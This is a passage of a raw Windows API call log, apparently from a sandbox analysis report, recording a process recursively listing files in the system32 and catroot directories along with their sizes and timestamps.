Flags=0x0, Size=0x92) returned 0x7164e0 [0060.400] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe154e3d9, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0xe154e3d9, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x829926a0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xbc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="capiprovider.dll", cAlternateFileName="")) returned 1 [0060.400] lstrlenW (lpString="capiprovider.dll") returned 16 [0060.400] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xa2) returned 0x71a290 [0060.400] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3f291a9a, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0x3f291a9a, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x829b97a0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x4e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="capisp.dll", cAlternateFileName="")) returned 1 [0060.400] lstrlenW (lpString="capisp.dll") returned 10 [0060.400] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x96) returned 0x716580 [0060.400] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3986c, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xe3986c, ftLastAccessTime.dwHighDateTime=0x1ca0432, ftLastWriteTime.dwLowDateTime=0xc4c8bad2, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="catroot", cAlternateFileName="")) returned 1 [0060.400] lstrlenW (lpString="catroot") returned 7 [0060.400] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x250) returned 0x71a340 [0060.400] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\catroot\\*", lpFindFileData=0x71a340 | out: lpFindFileData=0x71a340*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfecc0852, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xbb9ae6d0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xbb9ae6d0, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70cb48 [0060.401] FindNextFileW (in: hFindFile=0x70cb48, lpFindFileData=0x71a340 | out: lpFindFileData=0x71a340*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfecc0852, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xbb9ae6d0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xbb9ae6d0, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.401] FindNextFileW (in: hFindFile=0x70cb48, lpFindFileData=0x71a340 | out: lpFindFileData=0x71a340*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x76cc7c4b, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x76cc7c4b, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x76cc7c4b, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{127D0A1D-4EF2-11D1-8608-00C04FC295EE}", cAlternateFileName="{127D0~1")) returned 1 [0060.401] lstrlenW (lpString="{127D0A1D-4EF2-11D1-8608-00C04FC295EE}") returned 38 [0060.401] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x250) returned 0x71b5a0 [0060.401] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\catroot\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\*", lpFindFileData=0x71b5a0 | out: lpFindFileData=0x71b5a0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x76cc7c4b, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x76cc7c4b, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x76cc7c4b, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71b7f8 [0060.401] FindNextFileW (in: hFindFile=0x71b7f8, lpFindFileData=0x71b5a0 | out: lpFindFileData=0x71b5a0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x76cc7c4b, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x76cc7c4b, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x76cc7c4b, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.401] FindNextFileW (in: hFindFile=0x71b7f8, lpFindFileData=0x71b5a0 | out: lpFindFileData=0x71b5a0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x76cc7c4b, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x76cc7c4b, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x76cc7c4b, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0060.401] FindClose (in: hFindFile=0x71b7f8 | out: hFindFile=0x71b7f8) returned 1 [0060.401] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x71b5a0 | out: hHeap=0x6e0000) returned 1 [0060.401] FindNextFileW (in: hFindFile=0x70cb48, lpFindFileData=0x71a340 | out: lpFindFileData=0x71a340*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfecc0852, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xbb9ae6d0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xbb9ae6d0, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{F750E6C3-38EE-11D1-85E5-00C04FC295EE}", cAlternateFileName="{F750E~1")) returned 1 [0060.401] lstrlenW (lpString="{F750E6C3-38EE-11D1-85E5-00C04FC295EE}") returned 38 [0060.401] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x250) returned 0x71b5a0 [0060.402] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\catroot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\*", lpFindFileData=0x71b5a0 | out: lpFindFileData=0x71b5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfecc0852, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xbb9ae6d0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xbb9ae6d0, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71b7f8 [0060.402] FindNextFileW (in: hFindFile=0x71b7f8, lpFindFileData=0x71b5a0 | out: lpFindFileData=0x71b5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfecc0852, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xbb9ae6d0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xbb9ae6d0, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.402] FindNextFileW (in: hFindFile=0x71b7f8, lpFindFileData=0x71b5a0 | out: lpFindFileData=0x71b5a0*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x36c8d955, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x36c8d955, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x136fa600, ftLastWriteTime.dwHighDateTime=0x1cb88ea, nFileSizeHigh=0x0, nFileSizeLow=0x350c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Hyper-V-Common-Drivers-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MI636C~1.CAT")) returned 1 [0060.402] lstrlenW (lpString="Microsoft-Hyper-V-Common-Drivers-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 83 [0060.402] FindNextFileW (in: hFindFile=0x71b7f8, lpFindFileData=0x71b5a0 | out: lpFindFileData=0x71b5a0*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x36b82fb3, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x36b82fb3, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xf5a24100, ftLastWriteTime.dwHighDateTime=0x1cb88e9, nFileSizeHigh=0x0, nFileSizeLow=0x5e64, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Hyper-V-Guest-Integration-Drivers-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MI18AE~1.CAT")) returned 1 [0060.402] lstrlenW (lpString="Microsoft-Hyper-V-Guest-Integration-Drivers-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 94 [0060.403] FindNextFileW (in: hFindFile=0x71b7f8, lpFindFileData=0x71b5a0 | out: lpFindFileData=0x71b5a0*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x5eef4f35, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x5eef4f35, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x52592800, ftLastWriteTime.dwHighDateTime=0x1cb88f9, nFileSizeHigh=0x0, nFileSizeLow=0x3d1a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Media-Foundation-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MI4C4D~1.CAT")) returned 1 [0060.403] lstrlenW (lpString="Microsoft-Media-Foundation-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 82 [0060.403] FindNextFileW (in: hFindFile=0x71b7f8, lpFindFileData=0x71b5a0 | out: lpFindFileData=0x71b5a0*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x28be7b78, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x28be7b78, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xc7246600, ftLastWriteTime.dwHighDateTime=0x1cb88e9, nFileSizeHigh=0x0, nFileSizeLow=0x29248, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Media-Foundation-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MI4AB2~1.CAT")) returned 1 [0060.403] lstrlenW (lpString="Microsoft-Media-Foundation-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 77 [0060.403] FindNextFileW (in: hFindFile=0x71b7f8, lpFindFileData=0x71b5a0 | out: lpFindFileData=0x71b5a0*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6ea88624, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x6ea88624, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x2db18000, ftLastWriteTime.dwHighDateTime=0x1cb88fa, nFileSizeHigh=0x0, nFileSizeLow=0x23be, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Anytime-Upgrade-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MIC133~1.CAT")) returned 1 [0060.403] lstrlenW (lpString="Microsoft-Windows-Anytime-Upgrade-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 89 [0060.403] FindNextFileW (in: hFindFile=0x71b7f8, lpFindFileData=0x71b5a0 | out: lpFindFileData=0x71b5a0*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x3bce4069, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x3bce4069, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x3ac67300, ftLastWriteTime.dwHighDateTime=0x1cb88ea, nFileSizeHigh=0x0, nFileSizeLow=0x2602, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Anytime-Upgrade-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MI4044~1.CAT")) returned 1 [0060.403] lstrlenW (lpString="Microsoft-Windows-Anytime-Upgrade-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 84 [0060.403] FindNextFileW (in: hFindFile=0x71b7f8, lpFindFileData=0x71b5a0 | out: lpFindFileData=0x71b5a0*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6eb20ba5, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x6eb20ba5, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xae23b100, ftLastWriteTime.dwHighDateTime=0x1cb88f9, nFileSizeHigh=0x0, nFileSizeLow=0x2172, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Anytime-Upgrade-Results-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MI32E6~1.CAT")) returned 1 [0060.403] lstrlenW (lpString="Microsoft-Windows-Anytime-Upgrade-Results-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 97 [0060.403] FindNextFileW (in: hFindFile=0x71b7f8, lpFindFileData=0x71b5a0 | out: lpFindFileData=0x71b5a0*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x3bda274b, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x3bda274b, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x3ac67300, ftLastWriteTime.dwHighDateTime=0x1cb88ea, nFileSizeHigh=0x0, nFileSizeLow=0x2724, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Anytime-Upgrade-Results-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MI197C~1.CAT")) returned 1 [0060.403] lstrlenW (lpString="Microsoft-Windows-Anytime-Upgrade-Results-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 92 [0060.403] FindNextFileW (in: hFindFile=0x71b7f8, lpFindFileData=0x71b5a0 | out: lpFindFileData=0x71b5a0*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x64884b99, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x64884b99, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x180700, ftLastWriteTime.dwHighDateTime=0x1cb88f9, nFileSizeHigh=0x0, nFileSizeLow=0x306c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Backup-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MIA8CF~1.CAT")) returned 1 [0060.403] lstrlenW (lpString="Microsoft-Windows-Backup-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 80 [0060.403] FindNextFileW (in: hFindFile=0x71b7f8, lpFindFileData=0x71b5a0 | out: lpFindFileData=0x71b5a0*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x2e2f0078, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x2e2f0078, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xbd9afe00, ftLastWriteTime.dwHighDateTime=0x1cb88e9, nFileSizeHigh=0x0, nFileSizeLow=0x60fb, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Backup-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MIF331~1.CAT")) returned 1 [0060.403] lstrlenW (lpString="Microsoft-Windows-Backup-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 75 [0060.403] FindNextFileW (in: hFindFile=0x71b7f8, lpFindFileData=0x71b5a0 | out: lpFindFileData=0x71b5a0*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x64bca9e0, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x64bca9e0, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xbb40a000, ftLastWriteTime.dwHighDateTime=0x1cb88f9, nFileSizeHigh=0x0, nFileSizeLow=0x2bcc, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-BLB-Client-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MI0209~1.CAT")) returned 1 [0060.403] lstrlenW (lpString="Microsoft-Windows-BLB-Client-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 84 [0060.403] FindNextFileW (in: hFindFile=0x71b7f8, lpFindFileData=0x71b5a0 | out: lpFindFileData=0x71b5a0*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x342733e8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x342733e8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xc12e8500, ftLastWriteTime.dwHighDateTime=0x1cb88e9, nFileSizeHigh=0x0, nFileSizeLow=0x4d91, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-BLB-Client-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MI1FC1~1.CAT")) returned 1 [0060.403] lstrlenW (lpString="Microsoft-Windows-BLB-Client-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 79 [0060.403] FindNextFileW (in: hFindFile=0x71b7f8, lpFindFileData=0x71b5a0 | out: lpFindFileData=0x71b5a0*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x58507b71, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x58507b71, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa82dd000, ftLastWriteTime.dwHighDateTime=0x1cb88f9, nFileSizeHigh=0x0, nFileSizeLow=0x24e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Branding-Professional-Client-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MIC93D~1.CAT")) returned 1 [0060.403] lstrlenW (lpString="Microsoft-Windows-Branding-Professional-Client-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 102 [0060.404] FindNextFileW (in: hFindFile=0x71b7f8, lpFindFileData=0x71b5a0 | out: lpFindFileData=0x71b5a0*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x3ea1e2bd, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x3ea1e2bd, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x41ed8100, ftLastWriteTime.dwHighDateTime=0x1cb88ea, nFileSizeHigh=0x0, nFileSizeLow=0x5474, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Branding-Professional-Client-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MI8EF9~1.CAT")) returned 1 [0060.404] lstrlenW (lpString="Microsoft-Windows-Branding-Professional-Client-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 97 [0060.404] FindNextFileW (in: hFindFile=0x71b7f8, lpFindFileData=0x71b5a0 | out: lpFindFileData=0x71b5a0*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x58423330, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x58423330, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb67bec00, ftLastWriteTime.dwHighDateTime=0x1cb88f9, nFileSizeHigh=0x0, nFileSizeLow=0x2172, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Branding-Ultimate-Client-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MI1A80~1.CAT")) returned 1 [0060.404] lstrlenW (lpString="Microsoft-Windows-Branding-Ultimate-Client-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 98 [0060.404] FindNextFileW (in: hFindFile=0x71b7f8, lpFindFileData=0x71b5a0 | out: lpFindFileData=0x71b5a0*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x413a02a9, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x413a02a9, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x516cca00, ftLastWriteTime.dwHighDateTime=0x1cb88ea, nFileSizeHigh=0x0, nFileSizeLow=0x5474, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Branding-Ultimate-Client-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MI4C0D~1.CAT")) returned 1 [0060.404] lstrlenW (lpString="Microsoft-Windows-Branding-Ultimate-Client-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 93 [0060.404] FindNextFileW (in: hFindFile=0x71b7f8, lpFindFileData=0x71b5a0 | out: lpFindFileData=0x71b5a0*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x5f68b563, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x5f68b563, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x56397a00, ftLastWriteTime.dwHighDateTime=0x1cb88fa, nFileSizeHigh=0x0, nFileSizeLow=0x350c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-BusinessScanning-Feature-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MICA05~1.CAT")) returned 1 [0060.404] lstrlenW (lpString="Microsoft-Windows-BusinessScanning-Feature-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 98 [0060.404] FindNextFileW (in: hFindFile=0x71b7f8, lpFindFileData=0x71b5a0 | out: lpFindFileData=0x71b5a0*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x33724b53, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x33724b53, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x516cca00, ftLastWriteTime.dwHighDateTime=0x1cb88ea, nFileSizeHigh=0x0, nFileSizeLow=0x4ab2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-BusinessScanning-Feature-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MI3285~1.CAT")) returned 1 [0060.404] lstrlenW (lpString="Microsoft-Windows-BusinessScanning-Feature-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 93 [0060.404] FindNextFileW (in: hFindFile=0x71b7f8, lpFindFileData=0x71b5a0 | out: lpFindFileData=0x71b5a0*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x5560489b, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x5560489b, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x14a8cf00, ftLastWriteTime.dwHighDateTime=0x1cb88fa, nFileSizeHigh=0x0, nFileSizeLow=0x22f5d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Client-Drivers-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MIA162~1.CAT")) returned 1 [0060.404] lstrlenW (lpString="Microsoft-Windows-Client-Drivers-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 88 [0060.404] FindNextFileW (in: hFindFile=0x71b7f8, lpFindFileData=0x71b5a0 | out: lpFindFileData=0x71b5a0*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x33286e5, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x33286e5, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x14a0d300, ftLastWriteTime.dwHighDateTime=0x1cb88ea, nFileSizeHigh=0x0, nFileSizeLow=0x9b12a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Client-Drivers-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MI5C68~1.CAT")) returned 1 [0060.404] lstrlenW (lpString="Microsoft-Windows-Client-Drivers-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 83 [0060.404] FindNextFileW (in: hFindFile=0x71b7f8, lpFindFileData=0x71b5a0 | out: lpFindFileData=0x71b5a0*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x5dfa2178, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x5dfa2178, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x170b2900, ftLastWriteTime.dwHighDateTime=0x1cb88fa, nFileSizeHigh=0x0, nFileSizeLow=0x6901f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Client-Features-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MI1B4B~1.CAT")) returned 1 [0060.405] lstrlenW (lpString="Microsoft-Windows-Client-Features-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 89 [0060.405] FindNextFileW (in: hFindFile=0x71b7f8, lpFindFileData=0x71b5a0 | out: lpFindFileData=0x71b5a0*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x1bebf1de, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x1bebf1de, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x15d20000, ftLastWriteTime.dwHighDateTime=0x1cb88ea, nFileSizeHigh=0x0, nFileSizeLow=0xd62d1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Client-Features-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MI5116~1.CAT")) returned 1 [0060.405] lstrlenW (lpString="Microsoft-Windows-Client-Features-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 84 [0060.405] FindNextFileW (in: hFindFile=0x71b7f8, lpFindFileData=0x71b5a0 | out: lpFindFileData=0x71b5a0*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x4257a7ca, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x4257a7ca, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x92b8a600, ftLastWriteTime.dwHighDateTime=0x1cb88f9, nFileSizeHigh=0x0, nFileSizeLow=0x1ce2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Client-LanguagePack-Package-wrapper~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MI928B~1.CAT")) returned 1 [0060.405] lstrlenW (lpString="Microsoft-Windows-Client-LanguagePack-Package-wrapper~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 101 [0060.405] FindNextFileW (in: hFindFile=0x71b7f8, lpFindFileData=0x71b5a0 | out: 